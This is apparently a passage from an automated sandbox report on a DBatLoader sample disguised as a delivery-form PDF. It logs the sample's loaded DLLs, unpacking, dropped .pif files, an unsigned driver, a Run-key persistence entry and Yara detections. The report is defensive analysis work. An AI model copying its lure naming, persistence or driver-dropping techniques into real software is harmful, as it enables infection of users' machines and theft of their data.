                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\proquota.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeStatic file information: File size 1444352 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IzFuULsBXSkS.exe, 0000000F.00000000.2070567197.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915198433.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282039562.000000000065E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: dxobknwL.pif, 00000003.00000002.2212688667.000000002A1AE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2016612330.0000000029E60000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2004506026.0000000029CB2000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: dxobknwL.pif, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000601000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.000000000093A000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.0000000000911000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\dxobknwL.pifUnpacked PE file: 3.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\dxobknwL.pifUnpacked PE file: 8.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\dxobknwL.pifUnpacked PE file: 14.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.2930000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Lwnkboxd.PIF.23265a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Lwnkboxd.PIF.23265a8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1782801649.00000000023A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1821232938.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1919328602.0000000002326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: dxobknwL.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029487A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029487A0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0295C2FC push 0295C367h; ret 0_2_0295C35F
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029332FC push eax; ret 0_2_02933338
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293635A push 029363B7h; ret 0_2_029363AF
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293635C push 029363B7h; ret 0_2_029363AF
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0295C0AC push 0295C125h; ret 0_2_0295C11D
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0295C1F8 push 0295C288h; ret 0_2_0295C280
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0295C144 push 0295C1ECh; ret 0_2_0295C1E4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029486C0 push 02948702h; ret 0_2_029486FA
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293673E push 02936782h; ret 0_2_0293677A
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02936740 push 02936782h; ret 0_2_0293677A
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293C4F4 push ecx; mov dword ptr [esp], edx0_2_0293C4F9
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294E5B4 push ecx; mov dword ptr [esp], edx0_2_0294E5B9
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293D528 push 0293D554h; ret 0_2_0293D54C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293CB56 push 0293CCFAh; ret 0_2_0293CCF2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293CB74 push 0293CCFAh; ret 0_2_0293CCF2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0295BB6C push 0295BD94h; ret 0_2_0295BD8C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02947894 push 02947911h; ret 0_2_02947909
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029468D0 push 0294697Bh; ret 0_2_02946973
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029468CE push 0294697Bh; ret 0_2_02946973
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02948916 push 02948950h; ret 0_2_02948948
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02948918 push 02948950h; ret 0_2_02948948
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294A920 push 0294A958h; ret 0_2_0294A950
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02942EE8 push 02942F5Eh; ret 0_2_02942F56
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02945E04 push ecx; mov dword ptr [esp], edx0_2_02945E06
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02942FF4 push 02943041h; ret 0_2_02943039
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02942FF3 push 02943041h; ret 0_2_02943039
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004148B6 pushad ; retn 9DA8h3_2_00414987
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040D99D push esp; iretd 3_2_0040D99E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004182B8 push 0000005Bh; iretd 3_2_004182BA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_00416373 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_00416305 push ds; iretd 3_2_00416372

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Users\Public\Libraries\dxobknwL.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Lwnkboxd.PIFJump to dropped file
                      Sample is not signed and drops a device driver
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: \delivery form - airway bill details - tracking info 45821631127i ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: \delivery form - airway bill details - tracking info 45821631127i ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: \delivery form - airway bill details - tracking info 45821631127i ,pdf.scr.exeJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: \delivery form - airway bill details - tracking info 45821631127i ,pdf.scr.exeJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Users\Public\Libraries\dxobknwL.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Lwnkboxd.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LwnkboxdJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LwnkboxdJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0294A95C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
